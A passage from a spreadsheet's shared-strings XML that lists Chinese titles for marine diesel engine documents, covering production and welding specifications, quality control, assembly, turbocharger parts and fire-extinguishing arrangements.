    <t xml:space="preserve">顶撑配套螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机械顶撑准备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑外形                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶撑系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶撑布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支架支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶撑准备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压支撑设备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">减振器支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶部减振器布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶部减振器系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压减振器设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机空间要求                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平台布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">树脂垫块布置图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">底脚螺钉装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测量针放置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">底脚螺柱安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">端支撑螺钉装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">端支撑装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">侧支撑                                               </t>
  </si>
  <si>
    <t xml:space="preserve">右侧支撑垫块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">左侧支撑垫块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">入级备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">替代                                                </t>
  </si>
  <si>
    <t xml:space="preserve">生产规范                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座生产规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架生产规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴生产规范                                           </t>
  </si>
  <si>
    <t xml:space="preserve">连杆生产规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">船厂安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">KF137智能柴油机                                        </t>
  </si>
  <si>
    <t xml:space="preserve">MC-S轴承间隙质量控制                                      </t>
  </si>
  <si>
    <t xml:space="preserve">MC-S机座支撑锲生产建议                                     </t>
  </si>
  <si>
    <t xml:space="preserve">MC-S曲轴甩档质量控制                                      </t>
  </si>
  <si>
    <t xml:space="preserve">MC-S柴油机安装生产建议                                     </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">铸件说明书                                             </t>
  </si>
  <si>
    <t xml:space="preserve">白合金滑块质量规范                                         </t>
  </si>
  <si>
    <t xml:space="preserve">白合金推力轴承质量规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">铸铁说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">其它材料熔融                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高耐磨涂层                                             </t>
  </si>
  <si>
    <t xml:space="preserve">热量喷射雾质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">镀钼活塞裙                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座薄板焊接维修                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖热腐蚀维修                                          </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢修补                                              </t>
  </si>
  <si>
    <t xml:space="preserve">其他材料修补                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀杆修补                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锻钢连杆修补                                            </t>
  </si>
  <si>
    <t xml:space="preserve">板常规检验                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接技术要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接方法                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接次序                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接材料（电极）                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖焊接说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴焊接说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座焊接说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀焊接说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆涂层规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架焊接说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓焊接说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高压管焊接说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">固定设备焊接说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">冷却系统焊接说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压排气执行器质量规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">球墨蓄压块质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">焊接零件热处理生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">机加工尺寸指导                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座工艺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架工艺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">上部链传动部件工艺                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连杆工艺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">REG09机加工工艺                                        </t>
  </si>
  <si>
    <t xml:space="preserve">活塞工艺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺钉工艺                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵机构工艺                                           </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构工艺                                            </t>
  </si>
  <si>
    <t xml:space="preserve">REG33机加工工艺                                        </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵工艺                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮工艺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承工艺                                            </t>
  </si>
  <si>
    <t xml:space="preserve">L-MC工艺                                            </t>
  </si>
  <si>
    <t xml:space="preserve">各种说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座检查+作记号                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架检查+作记号                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱检查+作记号                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体检查+作记号                                         </t>
  </si>
  <si>
    <t xml:space="preserve">作标记说明                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机部件标记                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具标记                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆青铜衬垫                                            </t>
  </si>
  <si>
    <t xml:space="preserve">辅助风机质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管检查+作记号                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管检查+作记号                                        </t>
  </si>
  <si>
    <t xml:space="preserve">主要零件尺寸和重量                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空气冷却器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座机架装配说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴安装说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">基板总成装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链传动装配说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">调速器33子装配                                          </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器生产建议                                       </t>
  </si>
  <si>
    <t xml:space="preserve">焊接缩写号质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器装配说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管装配说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">质量控制/配置/检查                                        </t>
  </si>
  <si>
    <t xml:space="preserve">机座质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链传动上部质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓联结拧紧质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滑阀式喷油器生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷嘴热处理生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴接受标准                                            </t>
  </si>
  <si>
    <t xml:space="preserve">往复运动部件找中测量表                                       </t>
  </si>
  <si>
    <t xml:space="preserve">往复运动部件操作描述                                        </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖首次制造质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">装船后运动件检查                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链轮运行质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴链条质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">配置/检查质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">发电机轴质量规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">标准拉伸钢材试样                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主要装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座装配+对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">对中自由空间                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴适配轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承负荷测量生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴+飞轮安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">琴钢丝绕线盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承改变                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座对中                                              </t>
  </si>
  <si>
    <t xml:space="preserve">结构梁+机架对中                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机座铰刀+机架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盖箱+阀箱装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承+连杆装配                                        </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体安装调整                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">短贯穿螺栓装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气管装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴部件对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞装配安装对中                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滚筒机架安装说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链条+凸轮轴装配                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却油出口装配                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖+排气管装配                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵和执行机构装配                                        </t>
  </si>
  <si>
    <t xml:space="preserve">角度编码器装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统测试质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">阿尔法气缸润滑生产建议                                       </t>
  </si>
  <si>
    <t xml:space="preserve">注油器+调速器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">缸体对中安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电子注油器质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵机构安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架和机座对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导板重对中                                             </t>
  </si>
  <si>
    <t xml:space="preserve">4次力矩补偿器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导轨上部安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">水连接+排气阀安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">温度计安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">分解                                                </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧中层走台安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层走台安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层走台安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">功率输出安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测试后间隙检查                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮检查                                              </t>
  </si>
  <si>
    <t xml:space="preserve">建议                                                </t>
  </si>
  <si>
    <t xml:space="preserve">装配时密封                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液体密封材料生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">海试前润滑轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">船上安装介绍                                            </t>
  </si>
  <si>
    <t xml:space="preserve">硬度测量设备质量规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">激光/钢丝对中生产建议                                       </t>
  </si>
  <si>
    <t xml:space="preserve">高压燃油泵测试生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">试车台安全检查生产建议                                       </t>
  </si>
  <si>
    <t xml:space="preserve">2冲程柴油机安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">运输方式                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊运输方式                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器后端，运输方式                                      </t>
  </si>
  <si>
    <t xml:space="preserve">保存说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器/滴水分离器座                                        </t>
  </si>
  <si>
    <t xml:space="preserve">废气扩压环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内锥形物                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空气流过校直装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷射辅助装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力+径向轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器，备件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">回转轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气导向                                              </t>
  </si>
  <si>
    <t xml:space="preserve">转子总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压气机叶轮轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮端轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮端唇式密封                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平衡环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转子标记                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扩压器标记                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴总成部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">盖（涡轮增压器）                                          </t>
  </si>
  <si>
    <t xml:space="preserve">边盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">空气测量                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压气机壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锌块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">球轴承布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承座总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承块A                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承块B                                            </t>
  </si>
  <si>
    <t xml:space="preserve">消音器总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内部防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">外部防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洁防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空气过滤器箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">毡防护装置总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">毡防护装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶带支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带密封夹箍                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支持管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油柜                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带毂棘轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液面指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器化学清洗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却箱+管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">水洗阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">图纸摘要                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器外形                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">LKV-LKW装配图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">LLK装配图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">SLK装配图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">LKV-LKW空冷器壳体                                      </t>
  </si>
  <si>
    <t xml:space="preserve">LLK空冷器壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">SLK空冷器壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">BLK空冷器壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">LKS空冷器壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器壳体加工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器壳体焊接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器插芯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">KLK冷却器芯                                           </t>
  </si>
  <si>
    <t xml:space="preserve">热交换器附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器体密封                                            </t>
  </si>
  <si>
    <t xml:space="preserve">净化盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转换盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">后盖管板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空气换向室管板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器安装螺钉                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却元件-直管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚子导筒支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚子座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转子提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">延长管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器推动工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器锁紧工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器部件取出器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">装配件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转子锁定装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">末端终止板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮转子吊耳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">各种                                                </t>
  </si>
  <si>
    <t xml:space="preserve">干洗罐                                               </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽-空气清洗管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器芯子工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧辅助螺栓质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀功能测试生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴箱安全阀质量规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">机架质量规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">标记质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺柱上紧质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢缺陷修复质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">板超声波检查质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">湿磁粉探伤                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铸铁试样质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀研磨机质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀研磨机质量规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压分配器块质量规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">高压双层管生产建议                                         </t>
  </si>
  <si>
    <t xml:space="preserve">高压油管生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">高压油管质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">蚀刻焊接区域质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承座生产规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖质量规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢轴承座质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">铸造缸盖质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">铸造带肋活塞头质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环质量规范                                           </t>
  </si>
  <si>
    <t xml:space="preserve">铜铝活塞环质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环磨合层质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">焊接排气阀座质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">焊接活塞头质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">锻造缸盖质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">锻造齿轮质量规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖修复焊接质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">换向连杆首次制造质量控制                                      </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖质量规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">铸造曲柄质量规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座淬火质量规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">锻造曲柄质量规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">锻造蓄压块质量规范                                         </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴&amp;法兰质量规范                                         </t>
  </si>
  <si>
    <t xml:space="preserve">白合金主轴承质量标准                                        </t>
  </si>
  <si>
    <t xml:space="preserve">铝合金轴承质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀杆生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缸套生产建议                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸套润滑孔生产建议                                         </t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺栓安装生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">表面淬火生产规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">磷酸锰生产建议                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管子清洗和处理                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊后处理生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环槽硬化质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">连杆推力块生产规范                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀孔修复质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀表面硬化生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器底部焊接规范                                         </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头焊接生产规范                                         </t>
  </si>
  <si>
    <t xml:space="preserve">焊接收缩生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">换向连杆质量标准                                          </t>
  </si>
  <si>
    <t xml:space="preserve">允许规格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管子清洗处理生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压油取样生产建议                                         </t>
  </si>
  <si>
    <t xml:space="preserve">修边清洗生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱安装生产建议                                         </t>
  </si>
  <si>
    <t xml:space="preserve">触发环安装生产建议                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵盖压力测试生产建议                                      </t>
  </si>
  <si>
    <t xml:space="preserve">燃油柱塞和套筒质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">电子防护生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵装配生产建议                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压泵质量标准                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀测试设备质量规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">缸套首次制造质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">后端管连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">基础图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">发动机座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">车间实验                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力软管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵基座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">走台                                                </t>
  </si>
  <si>
    <t xml:space="preserve">空气分配器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">分配器管系安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">分配器壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">叉型连杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分配盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气分配器驱动                                         </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气分配器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气动空气分配器部件清单                                       </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扫器箱着火监测                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫器箱二氧化碳灭火                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扫器箱蒸汽灭火器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扫器箱halon灭火器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">扫器箱喷水灭火器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">露点报警                                              </t>
  </si>
  <si>
    <t xml:space="preserve">灭火主管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">灭火管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">露点箱报警                                             </t>
  </si>
  <si>
    <t xml:space="preserve">二氧化碳灭火管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽灭火总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽灭火管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">灭火泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">灭火总管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">水雾灭火管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">洒水器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器变更                                             </t>
  </si>
  <si>
    <t xml:space="preserve">清洗主管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">恒压布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器交换                                             </t>
  </si>
  <si>
    <t xml:space="preserve">隔断布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管绝缘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管加热                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油回油管加热                                           </t>
  </si>
  <si>
    <t xml:space="preserve">灭火器表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子元件连接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">附加信号连接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">蝶阀清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管子变更                                              </t>
  </si>
  <si>
